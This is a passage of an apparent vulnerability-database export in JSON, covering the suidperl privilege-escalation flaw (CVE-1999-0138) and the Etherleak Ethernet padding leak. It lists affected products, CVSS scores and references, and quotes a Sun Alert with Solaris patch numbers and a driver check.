        "trust": 1.3,
        "vendor": "linux",
        "version": "2.0"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "ibm",
        "version": "3.2.5"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "freebsd",
        "version": "2.0.5"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "freebsd",
        "version": "2.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.1.0"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "1.2.0"
      },
      {
        "model": "osf 1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "digital",
        "version": "1.3"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": "4"
      },
      {
        "model": "ews-ux v",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "nec",
        "version": "4.2mp"
      },
      {
        "model": "asl ux 4800",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "nec",
        "version": "*"
      },
      {
        "model": "up-ux v",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "nec",
        "version": "4.2mp"
      },
      {
        "model": "ews-ux v",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "nec",
        "version": "4.2"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "9"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "10"
      },
      {
        "model": "up-ux/v",
        "scope": null,
        "trust": 0.3,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "ews-ux 4.2mp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nec",
        "version": "v"
      },
      {
        "model": "ews-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nec",
        "version": "v4.2"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.1"
      },
      {
        "model": "osf",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "dpec",
        "version": "11.3"
      },
      {
        "model": "a/ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.1"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "77730"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0138"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199606-003"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:ibm:aix:4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:1.2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:nec:ews-ux_v:4.2mp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:ibm:aix:3.2.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:digital:osf_1:1.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.0.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:nec:ews-ux_v:4.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.1.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:nec:asl_ux_4800:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:a_ux:3.1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:nec:up-ux_v:4.2mp:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:freebsd:freebsd:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-1999-0138"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unknown",
    "sources": [
      {
        "db": "BID",
        "id": "77730"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-1999-0138",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": true,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-138",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-1999-0138",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-199606-003",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-138",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-138"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0138"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199606-003"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The suidperl and sperl program do not give up root privileges when changing UIDs back to the original users, allowing root access. HP-UX is prone to a local privilege-escalation vulnerability. \nLocal attackers may exploit this issue to gain root privileges",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-1999-0138"
      },
      {
        "db": "BID",
        "id": "77730"
      },
      {
        "db": "VULHUB",
        "id": "VHN-138"
      }
    ],
    "trust": 1.26
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-1999-0138",
        "trust": 2.0
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199606-003",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "77730",
        "trust": 0.4
      },
      {
        "db": "VULHUB",
        "id": "VHN-138",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-138"
      },
      {
        "db": "BID",
        "id": "77730"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0138"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199606-003"
      }
    ]
  },
  "id": "VAR-199606-0003",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-138"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T13:50:12.125000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-1999-0138"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/cve-1999-0138"
      },
      {
        "trust": 0.3,
        "url": "http://www.hp.com/products1/unix/"
      },
      {
        "trust": 0.1,
        "url": ""
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-138"
      },
      {
        "db": "BID",
        "id": "77730"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0138"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199606-003"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-138"
      },
      {
        "db": "BID",
        "id": "77730"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0138"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199606-003"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "1996-06-26T00:00:00",
        "db": "VULHUB",
        "id": "VHN-138"
      },
      {
        "date": "1996-06-26T00:00:00",
        "db": "BID",
        "id": "77730"
      },
      {
        "date": "1996-06-26T04:00:00",
        "db": "NVD",
        "id": "CVE-1999-0138"
      },
      {
        "date": "1996-06-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-199606-003"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2008-09-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-138"
      },
      {
        "date": "1996-06-26T00:00:00",
        "db": "BID",
        "id": "77730"
      },
      {
        "date": "2022-08-17T07:15:11.853000",
        "db": "NVD",
        "id": "CVE-1999-0138"
      },
      {
        "date": "2022-08-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-199606-003"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "77730"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199606-003"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "suidperl and sperl Security hole",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-199606-003"
      }
    ],
    "trust": 0.6
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-199606-003"
      }
    ],
    "trust": 0.6
  }
}

var-200301-0002
Vulnerability from variot

Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak. The network device driver fills in packet data for less than 46 bytes. The Ethernet standard (IEEE 802.3) defines that the minimum field of a packet is 46 bytes. If a higher layer protocol such as IP provides less than 46 bytes, the device driver must fill the data segment to meet the minimum frame size specification specified by IEEE 802. The padding value is generally NULL data. However, many Ethernet device drivers do not operate correctly in accordance with the standard implementation. The data is padded without using NULL bytes, and the previously transmitted frame data is reused for padding. Since the Ethernet frame buffer is allocated in the kernel memory space, some system sensitive information can be obtained by analyzing these padding data. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Cisco has stated that the IOS 12.1 and 12.2 trains are not affected. National Semiconductor Ethernet controller chips are not vulnerable to this issue.

This issue is described in CERT Vulnerability VU#412115 (see http://www.kb.cert.org/vuls/id/412115 and http://www.kb.cert.org/vuls/id/JPLA-5BGNYP).

  1. Contributing Factors

This issue can occur in the following releases:

SPARC Platform * Solaris 2.6 without patch 105181-35 * Solaris 7 without patch 112604-02 * Solaris 8 without patch 112609-02 * Solaris 9 without patch 115172-01

Note: The Am7990 ("LANCE") Ethernet driver le(7D) is for SPARC platforms only, thus x86 platforms are not affected.

This issue only occurs on SPARC systems that utilize the Am7990 ("LANCE") Ethernet driver (le(7D)).

To determine if the Am7990 Ethernet driver is installed on your system, run the following command: $ ifconfig -a le0: flags=1000849 mtu 8232 index 1 inet 127.0.0.0 netmask ff000000

Any reference to "le0" would indicate an open Lance Ethernet (le) interface.

  1. Symptoms

There are no predictable symptoms that would show the described issue has been exploited. SOLUTION SUMMARY:

  1. Relief/Workaround

There is no workaround for this issue. Please see "Resolution" section below.

  1. Resolution

This issue is addressed in the following releases:

SPARC Platform * Solaris 2.6 with patch 105181-35 or later * Solaris 7 with patch 112604-02 or later * Solaris 8 with patch 112609-02 or later * Solaris 9 with patch 115172-01 or later

This Sun Alert notification is being provided to you on an "AS IS" basis. This Sun Alert notification may contain information provided by third parties. The issues described in this Sun Alert notification may or may not impact your system(s). Sun makes no representations, warranties, or guarantees as to the information contained herein. ANY AND ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT, ARE HEREBY DISCLAIMED. BY ACCESSING THIS DOCUMENT YOU ACKNOWLEDGE THAT SUN SHALL IN NO EVENT BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, PUNITIVE, OR CONSEQUENTIAL DAMAGES THAT ARISE OUT OF YOUR USE OR FAILURE TO USE THE INFORMATION CONTAINED HEREIN. This Sun Alert notification contains Sun proprietary and confidential information. It is being provided to you pursuant to the provisions of your agreement to purchase services from Sun, or, if you do not have such an agreement, the Sun.com Terms of Use. This Sun Alert notification may only be used for the purposes contemplated by these agreements.

Copyright 2000-2003 Sun Microsystems, Inc., 4150 Network Circle, Santa Clara, CA 95054 U.S.A. All rights reserved. _________ _________

APPLIES TO: ATTACHMENTS:

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200301-0002",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "netbsd",
        "version": "1.5.1"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "netbsd",
        "version": "1.6"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "netbsd",
        "version": "1.5.3"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "netbsd",
        "version": "1.5.2"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "netbsd",
        "version": "1.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "linux",
        "version": "2.4.1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "freebsd",
        "version": "4.7"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "freebsd",
        "version": "4.6"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "freebsd",
        "version": "4.5"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "freebsd",
        "version": "4.4"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "freebsd",
        "version": "4.3"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "freebsd",
        "version": "4.2"
      },
      {
        "model": "windows 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": "windows 2000 terminal services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "debian linux",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "guardian digital",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "intel",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "mandriva",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "network appliance",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "xerox",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "10"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "oracle",
        "version": "11"
      },
      {
        "model": "cobalt raq550",
        "scope": null,
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "2.6 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "7.0 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "8 (sparc)"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": "9 (sparc)"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "10.20"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "11.00"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "hewlett packard",
        "version": "11.04"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "6.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "7.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "7.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "7.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "7.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "8.0"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.6,
        "vendor": "no",
        "version": null
      },
      {
        "model": "zynos v3.40",
        "scope": null,
        "trust": 0.3,
        "vendor": "zyxel",
        "version": null
      },
      {
        "model": "solaris 9 sparc",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "solaris 8 sparc",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "7.0"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "2.6"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "11"
      },
      {
        "model": "windows terminal services sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows terminal services sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows terminal services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows professional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows datacenter server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows datacenter server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows datacenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "windows advanced server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "linux mandrake ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.1"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.1"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "9.0"
      },
      {
        "model": "linux mandrake ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "8.2"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "8.2"
      },
      {
        "model": "multi network firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.0"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
